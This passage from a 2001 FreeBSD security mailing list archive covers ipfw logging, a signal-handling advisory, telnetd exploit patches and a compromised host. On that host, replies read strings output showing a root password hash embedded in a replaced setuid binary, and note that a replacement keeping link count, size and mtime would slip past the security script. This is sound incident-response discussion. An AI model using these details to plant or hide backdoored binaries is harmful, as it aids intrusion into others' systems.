logs but it was convenient to have the attempts listed on the monitor
when coming in the morning after.

Recently, I've upgraded to 4.3-RC2. Everything works fine but I don't
get the attempts listed on the monitor anymore. How can I get them
listed again?
Thanks,

Mario Lobo
-
*** Mario Lobo - mlobo@ear.com.br
*** American School of Recife

From owner-freebsd-security Tue Jul 24 6:51:52 2001
Date: Tue, 24 Jul 2001 16:50:38 +0300
From: Alexandr Listopad
To: Mario de Oliveira Lobo Neto
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw question
Message-ID: <20010724165038.Q89646@relay.reis.zp.ua>
In-Reply-To: <3B5D528A.2304.1D1FDA@localhost>

On Tue, Jul 24, 2001 at 10:48:41AM -0300, Mario de Oliveira Lobo Neto wrote:
> Please forgive my lame question but here it goes.
>
> We used to have FreeBSD 2.2.8. Every time a rule in ipfw was met,
> the attempt would get listed on the monitor. I know everything is in
> the logs but it was convenient to have the attempts listed on the
> monitor when coming in the morning after.
>
> Recently, I've upgraded to 4.3-RC2. Everything works fine but I
> don't get the attempts listed on the monitor anymore. How can I get
> them listed again?
see /etc/syslog.conf and syslog.conf(5)

--
Alexandr Listopad, ReIS

From owner-freebsd-security Tue Jul 24 7:33:58 2001
Date: Tue, 24 Jul 2001 10:36:07 -0400
From: Joseph
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Make world - crypt-blowfish.c error
Message-Id: <5.1.0.14.0.20010724103449.00adaab0@joseph.nicholasofmyra.org>
In-Reply-To: <20010723141245.A96187@xor.obsecurity.org>

Thank you. That was it. I had used the cvsupit port which did not list
src-crypto.

At 7/23/2001, Monday at 05:12 PM, Kris Kennaway wrote:
>You didn't cvsup the src-crypto collection.
>
>Kris

From owner-freebsd-security Tue Jul 24 7:40:40 2001
Date: Tue, 24 Jul 2001 18:34:30 +0400
From: "Nickolay A.Kritsky"
Organization: IHelp
To: "Mario de Oliveira Lobo Neto"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw question
Message-ID: <894633742.20010724183430@internethelp.ru>
In-Reply-To: <3B5D528A.2304.1D1FDA@localhost>

Hello Mario,

Tuesday, July 24, 2001, 5:48:41 PM, you wrote:

MdOLN> Please forgive my lame question but here it goes.

MdOLN> We used to have FreeBSD 2.2.8. Every time a rule in ipfw was met,
MdOLN> the attempt would get listed on the monitor. I know everything is in
MdOLN> the logs but it was convenient to have the attempts listed on the
MdOLN> monitor when coming in the morning after.

MdOLN> Recently, I've upgraded to 4.3-RC2. Everything works fine but I
MdOLN> don't get the attempts listed on the monitor anymore. How can I get
MdOLN> them listed again?
MdOLN> Thanks,

MdOLN> Mario Lobo
MdOLN> -
MdOLN> *** Mario Lobo - mlobo@ear.com.br
MdOLN> *** American School of Recife

I have met similar problems upgrading from 3.3 to 4.2 some time ago. The
reason is that from some point ipfw changed its log facility from kernel
to security. To see ipfw messages on the console again, you should
change the line in your /etc/syslog.conf file that says what messages
must go to the console (usually it is the first rule in
/etc/syslog.conf), like this:

<-------old line------->
*.err;kern.debug;auth.notice;mail.crit                  /dev/console
<-------new line------->
*.err;kern.debug;auth.notice;mail.crit;security.*       /dev/console

Good Luck

;-------------------------------------------
;  NKritsky
;   SysAdmin InternetHelp.Ru
;    http://www.internethelp.ru
;     mailto:nkritsky@internethelp.ru

From owner-freebsd-security Tue Jul 24 7:41:39 2001
Date: Tue, 24 Jul 2001 10:53:01 -0400 (EDT)
From: Jeff Gentry
To: freebsd-security@freebsd.org
Subject: Should I be concerned?

Hi there ...
I noticed this in my /var/log/messages yesterday:

Jul 23 13:03:24 hellfire /kernel: pid 279 (sh), uid 0: exited on signal 10 (core dumped)

Specifically, a sh w/ uid 0 core dumping didn't sit well with me.

I can't find anything in the various other logs that is at all "funny"
within a few minutes of that - which is not at all out of the ordinary
as there isn't much traffic on this machine.

Signal 10 is a bus error, right?

Are there any exploits out there currently which would generate a SIGBUS
like that? Or would this be indicative of failing hardware somewhere?

Thanks,
Jeff

From owner-freebsd-security Tue Jul 24 7:45:06 2001
Date: Tue, 24 Jul 2001 10:45:00 -0400
From: Chris Faulhaber
To: Jeff Gentry
Cc: freebsd-security@freebsd.org
Subject: Re: Should I be concerned?
Message-ID: <20010724104500.B42475@peitho.fxp.org>

On Tue, Jul 24, 2001 at 10:53:01AM -0400, Jeff Gentry wrote:
> Hi there ...
>
> I noticed this in my /var/log/messages yesterday:
> Jul 23 13:03:24 hellfire /kernel: pid 279 (sh), uid 0: exited on signal 10
> (core dumped)
>
> Specifically, a sh w/ uid 0 core dumping didn't sit well with me.
>
> I can't find anything in the various other logs that is at all
> "funny" within a few minutes of that - which is not at all out of the
> ordinary as there isn't much traffic on this machine.
>
> Signal 10 is a bus error, right?
>
> Are there any exploits out there currently which would generate a SIGBUS
> like that? Or would this be indicative of failing hardware somewhere?
>

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:42.signal.asc

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Tue Jul 24 7:49:48 2001
Date: Tue, 24 Jul 2001 11:01:13 -0400 (EDT)
From: Jeff Gentry
To: Chris Faulhaber
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Should I be concerned?
In-Reply-To: <20010724104500.B42475@peitho.fxp.org>

> ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:42.signal.asc

Interesting ... Is it possible to get that pattern from this bug w/o it
being "an exploit"? I ask because I only have one "local user" who is
not me, and there is no way in hell that she is savvy enough to do this.
Which means, that if there's a local user exploiting this, that I have
big problems :)

thanks,
Jeff

From owner-freebsd-security Tue Jul 24 7:59:57 2001
Date: Tue, 24 Jul 2001 11:53:44 -0300
From: "Mario de Oliveira Lobo Neto"
Organization: American School of Recife - Brazil
To: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw question
Reply-To: mlobo@ear.com.br
Message-ID: <3B5D61D0.25946.58CBEF@localhost>

Thanks to all that replied !
Mario
-
*** Mario Lobo - mlobo@ear.com.br
*** American School of Recife

From owner-freebsd-security Tue Jul 24 9:28:18 2001
Date: Tue, 24 Jul 2001 11:32:23 -0500
From: Jon Loeliger
To: security@freebsd.org
Subject: Security Check Diffs Question
Message-Id: <200107241632.LAA05639@chrome.jdl.com>

Hi Folks,

This morning, on a machine that's been up for 33 days, I suddenly saw
these /etc/security diffs:

setuid diffs:
20,22c20,22
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
---
> 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn
> 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass
> 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh
53,55c53,55
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
< 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh
---
> 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn
> 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass
> 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh

So, how paranoid am I here? How concerned am I? What compromise of my
system just took place?

Couple things to notice:

- The files now take fewer 512K blocks, but their sizes are the same?
- Most of the inodes stayed the same. Exact same. Are these hard linked
  files? Should be, right?
- The inode for ypchfn changed! It's no longer hard linked, right?

No form of disk restructuring, fsck, defrag, etc, was initiated by me.

Note that:

www 181 # cmp /usr/bin/{ypchpass,ypchfn}
/usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1

Here is a `strings /usr/bin/ypchfn`:

www 182 # strings /usr/bin/ypchfn
/usr/libexec/ld-elf.so.1
FreeBSD
libcrypt.so.2
_DYNAMIC
_init
__deregister_frame_info
crypt
strcmp
_fini
_GLOBAL_OFFSET_TABLE_
__register_frame_info
libc.so.4
strerror
execl
environ
fprintf
__progname
__error
setgid
__sF
execv
getpwuid
getpwnam
atexit
exit
strchr
execvp
setuid
_etext
_edata
__bss_start
_end
8/u
QR2cc.wsLFbKU
root

If someone didn't hack my system, I took a disk hit and lost part of
that file, right?

What other log files am I dissecting or where else am I poking for
further evidence?

Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making it a hard
link to the others again?
jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:45:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 651DC37B401 for ; Tue, 24 Jul 2001 09:45:13 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) with ESMTP id f6OGj9Hk017940 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Tue, 24 Jul 2001 09:45:09 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) id f6OGj96Z017937; Tue, 24 Jul 2001 09:45:09 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15197.42516.991529.833668@horsey.gshapiro.net> Date: Tue, 24 Jul 2001 09:45:08 -0700 From: Gregory Neil Shapiro To: Jon Loeliger Cc: security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> References: <200107241632.LAA05639@chrome.jdl.com> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org jdl> So, how paranoid am I here? How concerned am I? I would be concerned. jdl> Here is a `strings /usr/bin/ypchfn`: Much shorter than mine, and... jdl> www 182 # strings /usr/bin/ypchfn ... jdl> 8/u jdl> QR2cc.wsLFbKU jdl> root This looks like a constant password to set root to the next time it is run. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:47:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 4D69437B445 for ; Tue, 24 Jul 2001 09:47:12 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OGlBS95118 for ; Tue, 24 Jul 2001 12:47:11 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 12:41:18 -0400 To: security@freebsd.org From: Mike Tancsa Subject: telnetd remote root exploit released Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those of you not on bugtraq, the telnetd exploit was just posted on the list. 
---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:54:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp-server2.tampabay.rr.com (smtp-server2.cfl.rr.com [65.32.2.69]) by hub.freebsd.org (Postfix) with ESMTP id 84A9437B407 for ; Tue, 24 Jul 2001 09:54:36 -0700 (PDT) (envelope-from wade@ezri.org) Received: from ezri (242687hfc133.tampabay.rr.com [24.26.87.133]) by smtp-server2.tampabay.rr.com (8.11.2/8.11.2) with SMTP id f6OGsZc18977 for ; Tue, 24 Jul 2001 12:54:35 -0400 (EDT) From: "Wade Majors" To: Subject: RE: telnetd remote root exploit released Date: Tue, 24 Jul 2001 12:54:26 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2512.0001 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is the same one we are all patched against now, right? -Wade > For those of you not on bugtraq, the telnetd exploit was just > posted on the > list. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:56:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 5D7C737B405 for ; Tue, 24 Jul 2001 09:56:06 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OGu4S96254; Tue, 24 Jul 2001 12:56:04 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724124953.0799bb40@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 12:50:11 -0400 To: "Wade Majors" , From: Mike Tancsa Subject: RE: telnetd remote root exploit released In-Reply-To: References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, I believe so. ---Mike At 12:54 PM 7/24/01 -0400, Wade Majors wrote: >This is the same one we are all patched against now, right? > >-Wade > > > For those of you not on bugtraq, the telnetd exploit was just > > posted on the > > list. 
> >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:42:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id F0D2437B401 for ; Tue, 24 Jul 2001 10:42:50 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6OHgoZ59245 for ; Tue, 24 Jul 2001 12:42:50 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: telnetd root exploit Date: Tue, 24 Jul 2001 12:42:50 -0500 Message-ID: <002101c11468$0ed997a0$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal In-Reply-To: <20010723141609.B96187@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org OK, is there a how-to page for installing these patches? They aren't self-evident, and the search on FreeBSD.org keeps bringing up results from the committers' handbook... Maybe a related link on the security page for a how-to on installing SA patches or something. If it's really there, please forgive me. Thanks in advance. 
Chuck > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway > Sent: Monday, July 23, 2001 4:16 PM > To: Chuck Rock > Cc: security@FreeBSD.ORG > Subject: Re: telnetd root exploit > > > On Mon, Jul 23, 2001 at 12:06:50PM -0500, Chuck Rock wrote: > > Until an official advisory is released, does that mean there's > no official > > patch yet? > > Correct. The patches posted here last week were incomplete; I'm still > hoping to get the advisory out later today. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:43: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id 99AC237B405 for ; Tue, 24 Jul 2001 10:43:03 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OHgrs122026; Tue, 24 Jul 2001 13:42:53 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> References: <200107241632.LAA05639@chrome.jdl.com> Date: Tue, 24 Jul 2001 13:42:50 -0400 To: Jon Loeliger , security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: Security Check Diffs Question Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:32 AM -0500 7/24/01, Jon Loeliger wrote: >Hi Folks, > >This morning, on a machine that's been up for 33 days, >I suddenly saw these /etc/security diffs: > [...list deleted...] > >So, how paranoid am I here? How concerned am I? >What compromise of my system just took place? If I were you, I would be very concerned. 
I would do something to rebuild those binaries, and probably the whole system, before I let anyone change the password to any userid on the machine. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:53:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 6EF3C37B406 for ; Tue, 24 Jul 2001 10:53:16 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 17276 invoked by uid 1000); 24 Jul 2001 17:52:28 -0000 Date: Tue, 24 Jul 2001 20:52:28 +0300 From: Peter Pentchev To: Jon Loeliger Cc: security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724205228.A16243@ringworld.oblivion.bg> Mail-Followup-To: Jon Loeliger , security@freebsd.org References: <200107241632.LAA05639@chrome.jdl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107241632.LAA05639@chrome.jdl.com>; from jdl@jdl.com on Tue, Jul 24, 2001 at 11:32:23AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 24, 2001 at 11:32:23AM -0500, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 
2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh This means that there were 6 files hardlinked to inode 8047, now there are only five. One of the links was removed and probably replaced with something else, which cannot point to the same inode. > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh ypchfn changed its inode number, and its link count. This means that somebody performed an unlink() (delete) on ypchfn, and then created a new ypchfn with the same size, timestamp, permissions and stuff, but still a new file - and that's where the hardlink count + inum tracking of /etc/security kicked in and alerted you. > So, how paranoid am I here? How concerned am I? Very much. Probably enough to back up all the data files on the system and reinstall from scratch. > What compromise of my system just took place? Somebody obtained root privileges and installed a new file in place of ypchfn. > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? Not fewer 512K blocks; a smaller number of links to the same inode, meaning one of the links was removed. > - Most of the inodes stayed the same. Exact same. > Are these hard linked files? Should be, right? Yep, all the {yp}ch{fn,pass,sh} files are hardlinks to one binary. > - The inode for ypchfn changed! > It's no longer hard linked, right? No longer hardlinked to the same inode, but a separate file. 
> No form of disk restructuring, fsck, defrag, etc, was initiated by me. > > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 Figures. If someone went to the trouble of creating a separate file.. > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root ..and just as somebody else pointed out, the last two lines look like a 13-character DES-encrypted password hash and a username. I think that the 'new' ypchfn either replaces root's password, or asks for a password and gives a root shell if the user enters the password corresponding to that hash. > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? I very much doubt the normal ypchfn would contain a password hash and a well-known username, in that order, on two consecutive lines.. > What other log files am I dissecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? No, you back up all the data on your system, and reinstall it from scratch. Like, now. And keep in mind that even files without the 'executable' bit set might not qualify as data, if they are some kind of interpreted scripts (e.g. PHP3 web scripts). G'luck, Peter -- This sentence claims to be an Epimenides paradox, but it is lying. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:54: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 139A337B401 for ; Tue, 24 Jul 2001 10:54:06 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OHs1904209; Tue, 24 Jul 2001 13:54:01 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724134723.0840e520@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 13:48:07 -0400 To: "Chuck Rock" , From: Mike Tancsa Subject: RE: telnetd root exploit In-Reply-To: <002101c11468$0ed997a0$1805010a@epconline.net> References: <20010723141609.B96187@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:42 PM 7/24/01 -0500, Chuck Rock wrote: >OK, is there a how-to page for installing these patches? They aren't self->evident, and the search on FreeBSD.org keeps bringing up results from the >committers' handbook... There are instructions in the advisory. What part are you stuck on? i.e. post the steps you took, and where you ran into trouble. 
---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 75D9837B405 for ; Tue, 24 Jul 2001 11:06:10 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6ZM-0001NZ-00; Tue, 24 Jul 2001 19:06:08 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OI68l30404; Tue, 24 Jul 2001 19:06:08 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:06:07 +0100 From: Ben Smithurst To: Peter Pentchev Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724190607.F20105@strontium.shef.vinosystems.com> References: <200107241632.LAA05639@chrome.jdl.com> <20010724205228.A16243@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="SLDf9lqlvOQaIe6s" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724205228.A16243@ringworld.oblivion.bg> X-PGP-Key: http://www.smithurst.org/ben/pgp-key.txt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter Pentchev wrote: > ypchfn changed its inode number, and its link count. 
This means that > somebody performed an unlink() (delete) on ypchfn, and then created > a new ypchfn with the same size, timestamp, permissions and stuff, > but still a new file - and that's where the hardlink count + inum > tracking of /etc/security kicked in and alerted you. Hmm, so if an intruder replaced a file without changing its link count, size, or modification time, I wouldn't be alerted? Perhaps we should change the security script to print the file's ctime instead of mtime, since the ctime can't be forged? -- Ben Smithurst / ben@FreeBSD.org FreeBSD: The Power To Serve http://www.FreeBSD.org/ --SLDf9lqlvOQaIe6s Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbkPbPzJ+yzvRCwRAkPYAKDIMXvUljV8w/cDAB55KEXxchrvjACfZfAH pvJtofLsTwLr+Zsmpq3Nges= =YIY0 -----END PGP SIGNATURE----- --SLDf9lqlvOQaIe6s-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11:12:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from catfood.nt.phred.org (fw.phred.org [216.39.149.188]) by hub.freebsd.org (Postfix) with ESMTP id 67FD537B405; Tue, 24 Jul 2001 11:12:29 -0700 (PDT) (envelope-from alex@phred.org) Received: from phred.org ([216.39.149.189]) by catfood.nt.phred.org with Microsoft SMTPSVC(5.0.2195.3779); Tue, 24 Jul 2001 11:09:40 -0700 Date: Tue, 24 Jul 2001 11:11:17 -0700 (PDT) From: alex wetmore To: Ben Smithurst Cc: Peter Pentchev , Jon Loeliger , Subject: Re: Security Check Diffs Question In-Reply-To: <20010724190607.F20105@strontium.shef.vinosystems.com> Message-ID: <20010724110942.L32042-100000@phred.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-OriginalArrivalTime: 24 Jul 2001 18:09:40.0703 (UTC) FILETIME=[CED24EF0:01C1146B] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: 
